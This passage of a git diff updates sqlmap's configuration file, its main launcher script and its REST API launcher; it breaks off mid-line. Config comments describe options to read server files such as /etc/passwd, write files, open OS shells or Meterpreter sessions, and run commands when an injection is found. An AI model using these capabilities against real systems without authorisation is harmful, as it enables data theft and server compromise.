-# Back-end database management system database table to enumerate. +# Back-end database management system database table(s) to enumerate. tbl = -# Back-end database management system database table column to enumerate. +# Back-end database management system database table column(s) to enumerate. col = +# Back-end database management system identifiers (database(s), table(s) and column(s)) to not enumerate. +exclude = + +# Pivot column name. +pivotColumn = + +# Use WHERE condition while table dumping (e.g. "id=1"). +dumpWhere = + # Back-end database management system database user to enumerate. user = @@ -423,13 +567,13 @@ excludeSysDbs = False # First query output entry to retrieve # Valid: integer -# Default: 0 (sqlmap will start to retrieve the query output entries from -# the first) +# Default: 0 (sqlmap will start to retrieve the table dump entries from +# first one) limitStart = 0 # Last query output entry to retrieve # Valid: integer -# Default: 0 (sqlmap will detect the number of query output entries and +# Default: 0 (sqlmap will detect the number of table dump entries and # retrieve them until the last) limitStop = 0 @@ -447,7 +591,7 @@ lastChar = 0 # SQL statement to be executed. # Example: SELECT 'foo', 'bar' -query = +sqlQuery = # Prompt for an interactive SQL shell. # Valid: True or False @@ -468,6 +612,10 @@ commonTables = False # Valid: True or False commonColumns = False +# Check existence of common files. +# Valid: True or False +commonFiles = False + # These options can be used to create custom user-defined functions. [User-defined function] @@ -486,15 +634,15 @@ shLib = # Read a specific file from the back-end DBMS underlying file system. # Examples: /etc/passwd or C:\boot.ini -rFile = +fileRead = # Write a local file to a specific path on the back-end DBMS underlying # file system. # Example: /tmp/sqlmap.txt or C:\WINNT\Temp\sqlmap.txt -wFile = +fileWrite = # Back-end DBMS absolute filepath to write the file to. -dFile = +fileDest = # These options can be used to access the back-end database management @@ -509,11 +657,11 @@ osCmd = # Valid: True or False osShell = False -# Prompt for an out-of-band shell, meterpreter or VNC. +# Prompt for an out-of-band shell, Meterpreter or VNC. # Valid: True or False osPwn = False -# One click prompt for an out-of-band shell, meterpreter or VNC. +# One click prompt for an out-of-band shell, Meterpreter or VNC. # Valid: True or False osSmb = False @@ -568,41 +716,62 @@ regType = # These options can be used to set some general working parameters. [General] +# Load session from a stored (.sqlite) file +# Example: output/www.target.com/session.sqlite +sessionFile = + # Log all HTTP traffic into a textual file. trafficFile = +# Abort data retrieval on empty results. +abortOnEmpty = False + +# Set predefined answers (e.g. "quit=N,follow=N"). +answers = + +# Parameter(s) containing Base64 encoded data +base64Parameter = + +# Use URL and filename safe Base64 alphabet (Reference: https://en.wikipedia.org/wiki/Base64#URL_applications). +# Valid: True or False +base64Safe = False + # Never ask for user input, use the default behaviour. # Valid: True or False batch = False -# Force character encoding used for data retrieval. -charset = +# Result fields having binary values (e.g. "digest"). +binaryFields = -# Check to see if Tor is used properly. +# Check Internet connection before assessing the target. +checkInternet = False + +# Clean up the DBMS from sqlmap specific UDF and tables. # Valid: True or False -checkTor = False +cleanup = False -# Crawl the website starting from the target url. +# Crawl the website starting from the target URL. # Valid: integer # Default: 0 crawlDepth = 0 +# Regexp to exclude pages from crawling (e.g. "logout"). +crawlExclude = + # Delimiting character used in CSV output. # Default: , csvDel = , -# DBMS authentication credentials (user:password). Useful if you want to -# run SQL statements as another user, the back-end database management -# system is PostgreSQL or Microsoft SQL Server and the parameter is -# vulnerable by stacked queries SQL injection or you are connecting directly -# to the DBMS (-d switch). -# Syntax: username:password -dbmsCred = +# Store dumped data to a custom file. +dumpFile = # Format of dumped data # Valid: CSV, HTML or SQLITE dumpFormat = CSV +# Force character encoding used for data retrieval. +encoding = + # Retrieve each query output length and calculate the estimated time of # arrival in real time. # Valid: True or False @@ -612,70 +781,87 @@ eta = False # Valid: True or False flushSession = False -# Parse and test forms on target url. +# Parse and test forms on target URL. # Valid: True or False forms = False -# Ignores query results stored in session file. +# Ignore query results stored in session file. # Valid: True or False freshQueries = False -# Uses DBMS hex function(s) for data retrieval. +# Use Google dork results from specified page number. +# Valid: integer +# Default: 1 +googlePage = 1 + +# Use hex conversion during data retrieval. # Valid: True or False hexConvert = False # Custom output directory path. -oDir = +outputDir = # Parse and display DBMS error messages from responses. # Valid: True or False parseErrors = False -# Use Use Tor anonymity network. +# Use given script(s) for preprocessing of request. +preprocess = + +# Use given script(s) for postprocessing of response data. +postprocess = + +# Redump entries having unknown character marker (?). # Valid: True or False -tor = False +repair = False -# Set Tor proxy port other than default. -# Valid: integer -# torPort = +# Regular expression for filtering targets from provided Burp. +# or WebScarab proxy log. +# Example: (google|yahoo) +scope = -# Set Tor proxy type. -# Valid: HTTP, SOCKS4, SOCKS5 -torType = HTTP +# Skip heuristic detection of SQLi/XSS vulnerabilities. +# Valid: True or False +skipHeuristics = False -# Update sqlmap. +# Skip heuristic detection of WAF/IPS protection. # Valid: True or False -updateAll = False +skipWaf = False +# Prefix used for temporary tables. +# Default: sqlmap +tablePrefix = sqlmap -[Miscellaneous] +# Select tests by payloads and/or titles (e.g. ROW). +testFilter = -# Use short mnemonics (e.g. "flu,bat,ban,tec=EU"). -mnemonics = +# Skip tests by payloads and/or titles (e.g. BENCHMARK). +testSkip = -# Run shell command(s) when SQL injection is found. -alert = +# Run with a time limit in seconds (e.g. 3600). +timeLimit = -# Set question answers (e.g. "quit=N,follow=N"). -answers = +# Disable escaping of DBMS identifiers (e.g. "user"). +unsafeNaming = False -# Make a beep sound when SQL injection is found. -# Valid: True or False -beep = False +# Web server document root directory (e.g. "/var/www"). +webRoot = -# Offline WAF/IPS/IDS payload detection testing. -# Valid: True or False -checkPayload = False -# Check for existence of WAF/IPS/IDS protection. +[Miscellaneous] + +# Run host OS command(s) when SQL injection is found. +alert = + +# Beep on question and/or when SQL injection is found. # Valid: True or False -checkWaf = False +beep = False -# Clean up the DBMS by sqlmap specific UDF and tables. +# Offline WAF/IPS payload detection testing. # Valid: True or False -cleanup = False +checkPayload = False -# Check for missing (non-core) sqlmap dependencies. +# Check for missing (optional) sqlmap dependencies. # Valid: True or False dependencies = False @@ -683,29 +869,39 @@ dependencies = False # Valid: True or False disableColoring = False -# Use Google dork results from specified page number. -# Valid: integer -# Default: 1 -googlePage = 1 +# Disable hash analysis on table dumps. +# Valid: True or False +disableHashing = False -# Use HTTP parameter pollution. +# Display list of available tamper scripts. # Valid: True or False -hpp = False +listTampers = False -# Imitate smartphone through HTTP User-Agent header. +# Disable logging to a file. # Valid: True or False -mobile = False +noLogging = False -# Display page rank (PR) for Google dork results. +# Disable console output truncation. # Valid: True or False -pageRank = False +noTruncate = False -# Conduct through tests only if positive heuristic(s). +# Work in offline mode (only use session data) # Valid: True or False -smart = False +offline = False -# Select tests by payloads and/or titles (e.g. ROW) -testFilter = +# Location of CSV results file in multiple targets mode. +resultsFile = + +# Local directory for storing temporary files. +tmpDir = + +# Adjust options for unstable connections. +# Valid: True or False +unstable = False + +# Update sqlmap. +# Valid: True or False +updateAll = False # Simple wizard interface for beginner users. # Valid: True or False diff --git a/sqlmap.py b/sqlmap.py index 269be8157c5..5e93ef2c83d 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -1,17 +1,637 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import sys +from __future__ import print_function -PYVERSION = sys.version.split()[0] +try: + import sys -if PYVERSION >= "3" or PYVERSION < "2.6": - exit("[CRITICAL] incompatible Python version detected ('%s'). For successfully running sqlmap you'll have to use version 2.6 or 2.7 (visit 'http://www.python.org/download/')" % PYVERSION) -elif __name__ == "__main__": - from _sqlmap import main - from lib.controller.controller import start # needed for proper working of --profile switch - main() + sys.dont_write_bytecode = True + + try: + __import__("lib.utils.versioncheck") # this has to be the first non-standard import + except ImportError: + sys.exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details") + + import bdb + import glob + import inspect + import json + import logging + import os + import re + import shutil + import sys + import tempfile + import threading + import time + import traceback + import warnings + + if "--deprecations" not in sys.argv: + warnings.filterwarnings(action="ignore", category=DeprecationWarning) + else: + warnings.resetwarnings() + warnings.filterwarnings(action="ignore", message="'crypt'", category=DeprecationWarning) + warnings.simplefilter("ignore", category=ImportWarning) + if sys.version_info >= (3, 0): + warnings.simplefilter("ignore", category=ResourceWarning) + + warnings.filterwarnings(action="ignore", message="Python 2 is no longer supported") + warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) + warnings.filterwarnings(action="ignore", message=".*using a very old release", category=UserWarning) + warnings.filterwarnings(action="ignore", message=".*default buffer size will be used", category=RuntimeWarning) + warnings.filterwarnings(action="ignore", category=UserWarning, module="psycopg2") + + from lib.core.data import logger + + from lib.core.common import banner + from lib.core.common import checkPipedInput + from lib.core.common import checkSums + from lib.core.common import createGithubIssue + from lib.core.common import dataToStdout + from lib.core.common import extractRegexResult + from lib.core.common import filterNone + from lib.core.common import getDaysFromLastUpdate + from lib.core.common import getFileItems + from lib.core.common import getSafeExString + from lib.core.common import maskSensitiveData + from lib.core.common import openFile + from lib.core.common import setPaths + from lib.core.common import weAreFrozen + from lib.core.convert import getUnicode + from lib.core.common import setColor + from lib.core.common import unhandledExceptionMessage + from lib.core.compat import LooseVersion + from lib.core.compat import xrange + from lib.core.data import cmdLineOptions + from lib.core.data import conf + from lib.core.data import kb + from lib.core.datatype import OrderedSet + from lib.core.enums import MKSTEMP_PREFIX + from lib.core.exception import SqlmapBaseException + from lib.core.exception import SqlmapShellQuitException + from lib.core.exception import SqlmapSilentQuitException + from lib.core.exception import SqlmapUserQuitException + from lib.core.option import init + from lib.core.option import initOptions + from lib.core.patch import dirtyPatches + from lib.core.patch import resolveCrossReferences + from lib.core.settings import GIT_PAGE + from lib.core.settings import IS_WIN + from lib.core.settings import LAST_UPDATE_NAGGING_DAYS + from lib.core.settings import LEGAL_DISCLAIMER + from lib.core.settings import THREAD_FINALIZATION_TIMEOUT + from lib.core.settings import UNICODE_ENCODING + from lib.core.settings import VERSION + from lib.parse.cmdline import cmdLineParser + from lib.utils.crawler import crawl +except KeyboardInterrupt: + errMsg = "user aborted" + + if "logger" in globals(): + logger.critical(errMsg) + raise SystemExit + else: + import time + sys.exit("\r[%s] [CRITICAL] %s" % (time.strftime("%X"), errMsg)) + +def modulePath(): + """ + This will get us the program's directory, even if we are frozen + using py2exe + """ + + try: + _ = sys.executable if weAreFrozen() else __file__ + except NameError: + _ = inspect.getsourcefile(modulePath) + + return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) + +def checkEnvironment(): + try: + os.path.isdir(modulePath()) + except UnicodeEncodeError: + errMsg = "your system does not properly handle non-ASCII paths. " + errMsg += "Please move the sqlmap's directory to the other location" + logger.critical(errMsg) + raise SystemExit + + if LooseVersion(VERSION) < LooseVersion("1.0"): + errMsg = "your runtime environment (e.g. PYTHONPATH) is " + errMsg += "broken. Please make sure that you are not running " + errMsg += "newer versions of sqlmap with runtime scripts for older " + errMsg += "versions" + logger.critical(errMsg) + raise SystemExit + + # Patch for pip (import) environment + if "sqlmap.sqlmap" in sys.modules: + for _ in ("cmdLineOptions", "conf", "kb"): + globals()[_] = getattr(sys.modules["lib.core.data"], _) + + for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"): + globals()[_] = getattr(sys.modules["lib.core.exception"], _) + +def main(): + """ + Main function of sqlmap when running from command line. + """ + + try: + dirtyPatches() + resolveCrossReferences() + checkEnvironment() + setPaths(modulePath()) + banner() + + # Store original command line options for possible later restoration + args = cmdLineParser() + cmdLineOptions.update(args.__dict__ if hasattr(args, "__dict__") else args) + initOptions(cmdLineOptions) + + if checkPipedInput(): + conf.batch = True + + if conf.get("api"): + # heavy imports + from lib.utils.api import StdDbOut + from lib.utils.api import setRestAPILog + + # Overwrite system standard output and standard error to write + # to an IPC database + sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") + sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") + + setRestAPILog() + + conf.showTime = True + dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) + dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) + + init() + + if not conf.updateAll: + # Postponed imports (faster start) + if conf.smokeTest: + from lib.core.testing import smokeTest + os._exitcode = 1 - (smokeTest() or 0) + elif conf.vulnTest: + from lib.core.testing import vulnTest + os._exitcode = 1 - (vulnTest() or 0) + else: + from lib.controller.controller import start + if conf.profile: + from lib.core.profiling import profile + globals()["start"] = start + profile() + else: + try: + if conf.crawlDepth and conf.bulkFile: + targets = getFileItems(conf.bulkFile) + + for i in xrange(len(targets)): + target = None + + try: + kb.targets = OrderedSet() + target = targets[i] + + if not re.search(r"(?i)\Ahttp[s]*://", target): + target = "https://%s" % target + + infoMsg = "starting crawler for target URL '%s' (%d/%d)" % (target, i + 1, len(targets)) + logger.info(infoMsg) + + crawl(target) + except Exception as ex: + if target and not isinstance(ex, SqlmapUserQuitException): + errMsg = "problem occurred while crawling '%s' ('%s')" % (target, getSafeExString(ex)) + logger.error(errMsg) + else: + raise + else: + if kb.targets: + start() + else: + start() + except Exception as ex: + os._exitcode = 1 + + if "can't start new thread" in getSafeExString(ex): + errMsg = "unable to start new threads. Please check OS (u)limits" + logger.critical(errMsg) + raise SystemExit + else: + raise + + except SqlmapUserQuitException: + if not conf.batch: + errMsg = "user quit" + logger.error(errMsg) + + except (SqlmapSilentQuitException, bdb.BdbQuit): + pass + + except SqlmapShellQuitException: + cmdLineOptions.sqlmapShell = False + + except SqlmapBaseException as ex: + errMsg = getSafeExString(ex) + logger.critical(errMsg) + + os._exitcode = 1 + + raise SystemExit + + except KeyboardInterrupt: + try: + print() + except IOError: + pass + + except EOFError: + print() + + errMsg = "exit" + logger.error(errMsg) + + except SystemExit as ex: + os._exitcode = ex.code or 0 + + except: + print() + errMsg = unhandledExceptionMessage() + excMsg = traceback.format_exc() + valid = checkSums() + + os._exitcode = 255 + + if any(_ in excMsg for _ in ("MemoryError", "Cannot allocate memory")): + errMsg = "memory exhaustion detected" + logger.critical(errMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded", "Disk full while accessing")): + errMsg = "no space left on output device" + logger.critical(errMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("The paging file is too small",)): + errMsg = "no space left for paging file" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("Access is denied", "subprocess", "metasploit")): + errMsg = "permission error occurred while running Metasploit" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("Permission denied", "metasploit")): + errMsg = "permission error occurred while using Metasploit" + logger.critical(errMsg) + raise SystemExit + + elif "Read-only file system" in excMsg: + errMsg = "output device is mounted as read-only" + logger.critical(errMsg) + raise SystemExit + + elif "Insufficient system resources" in excMsg: + errMsg = "resource exhaustion detected" + logger.critical(errMsg) + raise SystemExit + + elif "OperationalError: disk I/O error" in excMsg: + errMsg = "I/O error on output device" + logger.critical(errMsg) + raise SystemExit + + elif "Violation of BIDI" in excMsg: + errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" + logger.critical(errMsg) + raise SystemExit + + elif "Invalid IPv6 URL" in excMsg: + errMsg = "invalid URL ('%s')" % excMsg.strip().split('\n')[-1] + logger.critical(errMsg) + raise SystemExit + + elif "_mkstemp_inner" in excMsg: + errMsg = "there has been a problem while accessing temporary files" + logger.critical(errMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("tempfile.mkdtemp", "tempfile.mkstemp", "tempfile.py")): + errMsg = "unable to write to the temporary directory '%s'. " % tempfile.gettempdir() + errMsg += "Please make sure that your disk is not full and " + errMsg += "that you have sufficient write permissions to " + errMsg += "create temporary files and/or directories" + logger.critical(errMsg) + raise SystemExit + + elif "Permission denied: '" in excMsg: + match = re.search(r"Permission denied: '([^']*)", excMsg) + errMsg = "permission error occurred while accessing file '%s'" % match.group(1) + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): + errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " + errMsg += "(Reference: 'https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe')" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("httpcore", "typing.", "AttributeError")): + errMsg = "please update the 'httpcore' package (>= 1.0.8) " + errMsg += "(Reference: 'https://github.com/encode/httpcore/discussions/995')" + logger.critical(errMsg) + raise SystemExit + + elif "invalid maximum character passed to PyUnicode_New" in excMsg and re.search(r"\A3\.[34]", sys.version) is not None: + errMsg = "please upgrade the Python version (>= 3.5) " + errMsg += "(Reference: 'https://bugs.python.org/issue18183')" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): + errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " + errMsg += "(Reference: 'https://github.com/PyMySQL/PyMySQL/issues/700')" + logger.critical(errMsg) + raise SystemExit + + elif "must be pinned buffer, not bytearray" in excMsg: + errMsg = "error occurred at Python interpreter which " + errMsg += "is fixed in 2.7. Please update accordingly " + errMsg += "(Reference: 'https://bugs.python.org/issue8104')" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("OSError: [Errno 22] Invalid argument: '", "importlib")): + errMsg = "unable to read file '%s'" % extractRegexResult(r"OSError: \[Errno 22\] Invalid argument: '(?P<result>[^']+)", excMsg) + logger.critical(errMsg) + raise SystemExit + + elif "hash_randomization" in excMsg: + errMsg = "error occurred at Python interpreter which " + errMsg += "is fixed in 2.7.3. Please update accordingly " + errMsg += "(Reference: 'https://docs.python.org/2/library/sys.html')" + logger.critical(errMsg) + raise SystemExit + + elif "AttributeError:" in excMsg and re.search(r"3\.11\.\d+a", sys.version): + errMsg = "there is a known issue when sqlmap is run with ALPHA versions of Python 3.11. " + errMsg += "Please download a stable Python version" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("Resource temporarily unavailable", "os.fork()", "dictionaryAttack")): + errMsg = "there has been a problem while running the multiprocessing hash cracking. " + errMsg += "Please rerun with option '--threads=1'" + logger.critical(errMsg) + raise SystemExit + + elif "can't start new thread" in excMsg: + errMsg = "there has been a problem while creating new thread instance. " + errMsg += "Please make sure that you are not running too many processes" + if not IS_WIN: + errMsg += " (or increase the 'ulimit -u' value)" + logger.critical(errMsg) + raise SystemExit + + elif "can't allocate read lock" in excMsg: + errMsg = "there has been a problem in regular socket operation " + errMsg += "('%s')" % excMsg.strip().split('\n')[-1] + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("pymysql", "configparser")): + errMsg = "wrong initialization of 'pymsql' detected (using Python3 dependencies)" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("ntlm", "socket.error, err", "SyntaxError")): + errMsg = "wrong initialization of 'python-ntlm' detected (using Python2 syntax)" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("drda", "to_bytes")): + errMsg = "wrong initialization of 'drda' detected (using Python3 syntax)" + logger.critical(errMsg) + raise SystemExit + + elif "'WebSocket' object has no attribute 'status'" in excMsg: + errMsg = "wrong websocket library detected" + errMsg += " (Reference: 'https://github.com/sqlmapproject/sqlmap/issues/4572#issuecomment-775041086')" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("window = tkinter.Tk()",)): + errMsg = "there has been a problem in initialization of GUI interface " + errMsg += "('%s')" % excMsg.strip().split('\n')[-1] + logger.critical(errMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("unable to access item 'liveTest'",)): + errMsg = "detected usage of files from different versions of sqlmap" + logger.critical(errMsg) + raise SystemExit + + elif any(_ in errMsg for _ in (": 9.9.9#",)): + errMsg = "LOL xD" + logger.critical(errMsg) + raise SystemExit + + elif kb.get("dumpKeyboardInterrupt"): + raise SystemExit + + elif any(_ in excMsg for _ in ("Broken pipe", "KeyboardInterrupt")): + raise SystemExit + + elif valid is False: + errMsg = "code checksum failed (turning off automatic issue creation). " + errMsg += "You should retrieve the latest development version from official GitHub " + errMsg += "repository at '%s'" % GIT_PAGE + logger.critical(errMsg) + print() + dataToStdout(excMsg) + raise SystemExit + + elif any(_ in "%s\n%s" % (errMsg, excMsg) for _ in ("tamper/", "waf/", "--engagement-dojo")): + logger.critical(errMsg) + print() + dataToStdout(excMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", "<frozen", "Can't find file for module", "SAXReaderNotAvailable", "<built-in function compile> returned NULL without setting an exception", "source code string cannot contain null bytes", "No module named", "tp_name field", "module 'sqlite3' has no attribute 'OperationalError'")): + errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("SyntaxError: Non-ASCII character", ".py on line", "but no encoding declared")): + errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("FileNotFoundError: [Errno 2] No such file or directory", "cwd = os.getcwd()")): + errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("PermissionError: [WinError 5]", "multiprocessing")): + errMsg = "there is a permission problem in running multiprocessing on this system. " + errMsg += "Please rerun with '--disable-multi'" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("No such file", "_'")): + errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] + errMsg += "You should retrieve the latest development version from official GitHub " + errMsg += "repository at '%s'" % GIT_PAGE + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("No such file", "sqlmap.conf", "Test")): + errMsg = "you are trying to run (hidden) development tests inside the production environment" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("HTTPNtlmAuthHandler", "'str' object has no attribute 'decode'")): + errMsg = "package 'python-ntlm' has a known compatibility issue with the " + errMsg += "Python 3 (Reference: 'https://github.com/mullender/python-ntlm/pull/61')" + logger.critical(errMsg) + raise SystemExit + + elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): + errMsg = "there has been a problem in enumeration. " + errMsg += "Because of a considerable chance of false-positive case " + errMsg += "you are advised to rerun with switch '--flush-session'" + logger.critical(errMsg) + raise SystemExit + + elif "database disk image is malformed" in excMsg: + errMsg = "local session file seems to be malformed. Please rerun with '--flush-session'" + logger.critical(errMsg) + raise SystemExit + + elif "'cryptography' package is required" in excMsg: + errMsg = "third-party library 'cryptography' is required" + logger.critical(errMsg) + raise SystemExit + + elif "AttributeError: 'module' object has no attribute 'F_GETFD'" in excMsg: + errMsg = "invalid runtime (\"%s\") " % excMsg.split("Error: ")[-1].strip() + errMsg += "(Reference: 'https://stackoverflow.com/a/38841364' & 'https://bugs.python.org/issue24944#msg249231')" + logger.critical(errMsg) + raise SystemExit + + elif "bad marshal data (unknown type code)" in excMsg: + match = re.search(r"\s*(.+)\s+ValueError", excMsg) + errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") + errMsg += ". Please delete .pyc files on your system to fix the problem" + logger.critical(errMsg) + raise SystemExit + + for match in re.finditer(r'File "(.+?)", line', excMsg): + file_ = match.group(1) + try: + file_ = os.path.relpath(file_, os.path.dirname(__file__)) + except ValueError: + pass + file_ = file_.replace("\\", '/') + if "../" in file_: + file_ = re.sub(r"(\.\./)+", '/', file_) + else: + file_ = file_.lstrip('/') + file_ = re.sub(r"/{2,}", '/', file_) + excMsg = excMsg.replace(match.group(1), file_) + + errMsg = maskSensitiveData(errMsg) + excMsg = maskSensitiveData(excMsg) + + if conf.get("api") or not valid or kb.get("lastCtrlCTime"): + logger.critical("%s\n%s" % (errMsg, excMsg)) + else: + logger.critical(errMsg) + dataToStdout("%s\n" % setColor(excMsg.strip(), level=logging.CRITICAL)) + createGithubIssue(errMsg, excMsg) + + finally: + kb.threadContinue = False + + if (getDaysFromLastUpdate() or 0) > LAST_UPDATE_NAGGING_DAYS: + warnMsg = "your sqlmap version is outdated" + logger.warning(warnMsg) + + if conf.get("showTime"): + dataToStdout("\n[*] ending @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) + + kb.threadException = True + + for tempDir in conf.get("tempDirs", []): + for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): + for filepath in glob.glob(os.path.join(tempDir, "%s*" % prefix)): + try: + os.remove(filepath) + except OSError: + pass + + if any((conf.vulnTest, conf.smokeTest)) or not filterNone(filepath for filepath in glob.glob(os.path.join(tempDir, '*')) if not any(filepath.endswith(_) for _ in (".lock", ".exe", ".so", '_'))): # ignore junk files + try: + shutil.rmtree(tempDir, ignore_errors=True) + except OSError: + pass + + if conf.get("hashDB"): + conf.hashDB.flush() + conf.hashDB.close() # NOTE: because of PyPy + + if conf.get("harFile"): + try: + with openFile(conf.harFile, "w+") as f: + json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) + except SqlmapBaseException as ex: + errMsg = getSafeExString(ex) + logger.critical(errMsg) + + if conf.get("api"): + conf.databaseCursor.disconnect() + + if conf.get("dumper"): + conf.dumper.flush() + + # short delay for thread finalization + _ = time.time() + while threading.active_count() > 1 and (time.time() - _) < THREAD_FINALIZATION_TIMEOUT: + time.sleep(0.01) + + if cmdLineOptions.get("sqlmapShell"): + cmdLineOptions.clear() + conf.clear() + kb.clear() + conf.disableBanner = True + main() + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + pass + except SystemExit: + raise + except: + traceback.print_exc() + finally: + # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program + if threading.active_count() > 1: + os._exit(getattr(os, "_exitcode", 0)) + else: + sys.exit(getattr(os, "_exitcode", 0)) +else: + # cancelling postponed imports (because of CI/CD checks) + __import__("lib.controller.controller") diff --git a/sqlmapapi.py b/sqlmapapi.py index 8e1e12bbd97..99862b65bc6 100755 --- a/sqlmapapi.py +++ b/sqlmapapi.py @@ -1,44 +1,117 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import sys + +sys.dont_write_bytecode = True + +__import__("lib.utils.versioncheck") # this has to be the first non-standard import + import logging -import optparse +import os +import warnings + +warnings.filterwarnings(action="ignore", category=UserWarning) +warnings.filterwarnings(action="ignore", category=DeprecationWarning) + +try: + from optparse import OptionGroup + from optparse import OptionParser as ArgumentParser + + ArgumentParser.add_argument = ArgumentParser.add_option + + def _add_argument(self, *args, **kwargs): + return self.add_option(*args, **kwargs) + + OptionGroup.add_argument = _add_argument + +except ImportError: + from argparse import ArgumentParser + +finally: + def get_actions(instance): + for attr in ("option_list", "_group_actions", "_actions"): + if hasattr(instance, attr): + return getattr(instance, attr) -from _sqlmap import modulePath + def get_groups(parser): + return getattr(parser, "option_groups", None) or getattr(parser, "_action_groups") + + def get_all_options(parser): + retVal = set() + + for option in get_actions(parser): + if hasattr(option, "option_strings"): + retVal.update(option.option_strings) + else: + retVal.update(option._long_opts) + retVal.update(option._short_opts) + + for group in get_groups(parser): + for option in get_actions(group): + if hasattr(option, "option_strings"): + retVal.update(option.option_strings) + else: + retVal.update(option._long_opts) + retVal.update(option._short_opts) + + return retVal + +from lib.core.common import getUnicode from lib.core.common import setPaths -from lib.core.data import paths from lib.core.data import logger +from lib.core.patch import dirtyPatches +from lib.core.patch import resolveCrossReferences +from lib.core.settings import RESTAPI_DEFAULT_ADAPTER +from lib.core.settings import RESTAPI_DEFAULT_ADDRESS +from lib.core.settings import RESTAPI_DEFAULT_PORT +from lib.core.settings import UNICODE_ENCODING from lib.utils.api import client from lib.utils.api import server -RESTAPI_SERVER_HOST = "127.0.0.1" -RESTAPI_SERVER_PORT = 8775 +try: + from sqlmap import modulePath +except ImportError: + def modulePath(): + return getUnicode(os.path.dirname(os.path.realpath(__file__)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) -if __name__ == "__main__": +def main(): """ REST-JSON API main function """ + + dirtyPatches() + resolveCrossReferences() + # Set default logging level to debug logger.setLevel(logging.DEBUG) - # Initialize path variable - paths.SQLMAP_ROOT_PATH = modulePath() - setPaths() + # Initialize paths + setPaths(modulePath()) # Parse command line options - apiparser = optparse.OptionParser() - apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_SERVER_PORT, action="store_true") - apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_SERVER_PORT, action="store_true") - apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server", default=RESTAPI_SERVER_HOST, action="store") - apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server", default=RESTAPI_SERVER_PORT, type="int", action="store") - (args, _) = apiparser.parse_args() + apiparser = ArgumentParser() + apiparser.add_argument("-s", "--server", help="Run as a REST-JSON API server", action="store_true") + apiparser.add_argument("-c", "--client", help="Run as a REST-JSON API client", action="store_true") + apiparser.add_argument("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS) + apiparser.add_argument("-p", "--port", help="Port of the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type=int) + apiparser.add_argument("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % 